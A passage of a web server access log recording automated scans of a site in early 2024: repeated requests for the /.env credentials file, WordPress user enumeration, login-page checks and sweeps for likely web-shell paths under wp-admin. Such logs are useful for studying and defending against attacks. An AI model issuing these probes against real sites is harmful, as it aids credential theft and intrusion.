Firefox/95.0" 62.221.192.174 - - [29/Jan/2024:02:42:36 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 62.221.192.174 - - [29/Jan/2024:02:42:41 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 146.190.130.60 - - [29/Jan/2024:11:55:31 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 146.190.130.60 - - [29/Jan/2024:11:55:31 +0700] "POST / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 146.190.130.60 - - [29/Jan/2024:22:04:29 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 146.190.130.60 - - [29/Jan/2024:22:04:30 +0700] "POST / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 146.190.130.60 - - [29/Jan/2024:22:44:53 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 146.190.130.60 - - [29/Jan/2024:22:45:04 +0700] "POST / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 103.171.90.221 - - [30/Jan/2024:02:22:30 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 103.171.90.221 - - [30/Jan/2024:02:22:34 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 103.171.90.221 - - [30/Jan/2024:02:22:37 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 146.190.130.60 - - [30/Jan/2024:04:56:36 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 146.190.130.60 - - [30/Jan/2024:04:56:46 +0700] "POST / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 199.45.155.49 - - [31/Jan/2024:16:30:01 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 54.78.40.54 - - [01/Feb/2024:02:13:06 +0700] "GET / HTTP/1.0" 301 162 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" 91.92.252.169 - - [01/Feb/2024:04:30:08 +0700] "GET /style.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [01/Feb/2024:04:30:23 +0700] "GET /wp-includes/style.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [01/Feb/2024:04:30:33 +0700] "GET /wp-content/uploads/style.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [01/Feb/2024:04:30:43 +0700] "GET /wp-content/style.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [01/Feb/2024:04:30:52 +0700] "GET /wp-admin/style.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 146.190.130.60 - - [01/Feb/2024:11:08:06 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 146.190.130.60 - - [01/Feb/2024:11:08:07 +0700] "POST / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 204.188.215.250 - - [02/Feb/2024:00:54:15 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 204.188.215.250 - - [02/Feb/2024:00:54:23 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 204.188.215.250 - - [02/Feb/2024:00:54:27 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 91.92.252.169 - - [02/Feb/2024:13:49:57 +0700] "GET /wp-admin/images/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [02/Feb/2024:13:50:08 +0700] "GET /wp-admin/css/colors/midnight/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [02/Feb/2024:13:50:19 +0700] "GET /wp-admin/css/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [02/Feb/2024:13:50:33 +0700] "GET /wp-admin/css/colors/light/content.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [02/Feb/2024:13:50:46 +0700] "GET /wp-admin/css/colors/coffee/profile.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [02/Feb/2024:13:50:58 +0700] "GET /wp-admin/css/colors/midnight/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [02/Feb/2024:13:51:09 +0700] "GET /wp-admin/css/colors/light/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [02/Feb/2024:13:51:20 +0700] "GET /wp-admin/css/colors/light/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [02/Feb/2024:13:51:34 +0700] "GET /wp-admin/css/colors/sunrise/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [02/Feb/2024:13:51:46 +0700] "GET /wp-admin/css/style.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [02/Feb/2024:13:52:01 +0700] "GET /wp-admin/css/colors/ectoplasm/load-styles.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [02/Feb/2024:13:52:19 +0700] "GET /wp-admin/images/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [02/Feb/2024:13:52:30 +0700] "GET /wp-admin/css/colors/midnight/profile.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [02/Feb/2024:13:52:41 +0700] "GET /wp-admin/css/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 198.235.24.195 - - [02/Feb/2024:14:09:29 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 165.22.230.237 - - [02/Feb/2024:17:46:56 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 162.55.84.38 - - [03/Feb/2024:01:10:30 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 162.55.84.38 - - [03/Feb/2024:01:10:38 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 162.55.84.38 - - [03/Feb/2024:01:10:42 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 180.241.47.250 - - [03/Feb/2024:16:39:43 +0700] "GET / HTTP/1.1" 301 162 "-" "fasthttp" 205.210.31.153 - - [04/Feb/2024:06:10:15 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 51.178.183.79 - - [04/Feb/2024:07:37:13 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 51.178.183.79 - - [04/Feb/2024:07:37:24 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 51.178.183.79 - - [04/Feb/2024:07:37:31 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 207.55.244.7 - - [04/Feb/2024:22:48:19 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 207.55.244.7 - - [04/Feb/2024:22:48:24 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 207.55.244.7 - - [04/Feb/2024:22:48:28 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 146.190.130.60 - - [06/Feb/2024:01:49:23 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 146.190.130.60 - - [06/Feb/2024:01:49:23 +0700] "POST / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 68.178.225.104 - - [06/Feb/2024:02:34:21 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 68.178.225.104 - - [06/Feb/2024:02:34:23 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 68.178.225.104 - - [06/Feb/2024:02:34:26 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 205.210.31.203 - - [06/Feb/2024:09:42:13 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 203.22.30.3 - - [09/Feb/2024:05:42:24 +0700] "HEAD / HTTP/1.1" 301 0 "-" "-" 203.22.30.3 - - [09/Feb/2024:05:42:35 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 198.235.24.116 - - [09/Feb/2024:17:35:14 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 65.154.226.168 - - [12/Feb/2024:11:49:13 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" 198.235.24.122 - - [14/Feb/2024:09:04:02 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 123.57.5.63 - - [15/Feb/2024:21:51:45 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 123.57.5.63 - - [15/Feb/2024:21:52:05 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 123.57.5.63 - - [15/Feb/2024:21:52:33 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 146.190.131.252 - - [17/Feb/2024:00:56:18 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 116.12.48.101 - - [17/Feb/2024:01:12:47 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 116.12.48.101 - - [17/Feb/2024:01:12:49 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 116.12.48.101 - - [17/Feb/2024:01:12:52 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 64.4.160.14 - - [19/Feb/2024:02:41:33 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 64.4.160.14 - - [19/Feb/2024:02:41:40 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 64.4.160.14 - - [19/Feb/2024:02:41:45 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 91.92.252.169 - - [21/Feb/2024:08:49:04 +0700] "GET /wp-admin/images/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [21/Feb/2024:08:49:14 +0700] "GET /wp-admin/css/colors/midnight/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [21/Feb/2024:08:49:23 +0700] "GET /wp-admin/css/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [21/Feb/2024:08:49:33 +0700] "GET /wp-admin/css/colors/light/content.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [21/Feb/2024:08:49:42 +0700] "GET /wp-admin/css/colors/coffee/profile.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [21/Feb/2024:08:49:51 +0700] "GET /wp-admin/css/colors/midnight/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [21/Feb/2024:08:50:01 +0700] "GET /wp-admin/css/colors/light/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [21/Feb/2024:08:50:10 +0700] "GET /wp-admin/css/colors/light/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [21/Feb/2024:08:50:19 +0700] "GET /wp-admin/css/colors/sunrise/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [21/Feb/2024:08:50:29 +0700] "GET /wp-admin/css/style.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [21/Feb/2024:08:50:38 +0700] "GET /wp-admin/css/colors/ectoplasm/load-styles.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [21/Feb/2024:08:50:48 +0700] "GET /wp-admin/images/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [21/Feb/2024:08:50:57 +0700] "GET /wp-admin/css/colors/midnight/profile.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [21/Feb/2024:08:51:07 +0700] "GET /wp-admin/css/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 50.62.180.145 - - [23/Feb/2024:03:25:31 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 50.62.180.145 - - [23/Feb/2024:03:25:37 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 50.62.180.145 - - [23/Feb/2024:03:25:46 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 14.254.88.31 - - [23/Feb/2024:10:07:19 +0700] "GET /wp-json/?rest_route=/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0" 202.180.29.69 - - [23/Feb/2024:10:07:22 +0700] "GET /wp-json/?rest_route=/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69" 110.78.154.13 - - [23/Feb/2024:10:07:27 +0700] "GET /wp-json/?rest_route=/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0" 117.2.16.123 - - [23/Feb/2024:10:07:29 +0700] "GET /wp-json/?rest_route=/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Edg/84.0.522.63" 115.87.251.218 - - [23/Feb/2024:10:07:32 +0700] "GET /wp-json/?rest_route=/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36" 91.92.252.169 - - [23/Feb/2024:11:14:53 +0700] "GET /style.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [23/Feb/2024:11:15:02 +0700] "GET /wp-includes/style.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [23/Feb/2024:11:15:10 +0700] "GET /wp-content/uploads/style.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [23/Feb/2024:11:15:18 +0700] "GET /wp-content/style.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [23/Feb/2024:11:15:27 +0700] "GET /wp-admin/style.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 118.96.148.183 - - [24/Feb/2024:11:14:39 +0700] "GET /wp-json/?rest_route=/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 Edg/83.0.478.37" 46.43.94.98 - - [24/Feb/2024:11:14:42 +0700] "GET /wp-json/?rest_route=/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 Edg/83.0.478.37" 36.65.235.28 - - [24/Feb/2024:11:15:02 +0700] "GET /wp-json/?rest_route=/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 Edg/83.0.478.37" 110.138.6.231 - - [24/Feb/2024:11:15:05 +0700] "GET /wp-json/?rest_route=/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36" 35.87.192.38 - - [25/Feb/2024:19:41:14 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; wpbot/1.0; +https://forms.gle/ajBaxygz9jSR8p8G9)" 35.87.192.38 - - [25/Feb/2024:19:41:22 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; wpbot/1.0; +https://forms.gle/ajBaxygz9jSR8p8G9)" 205.210.31.51 - - [28/Feb/2024:03:27:48 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: 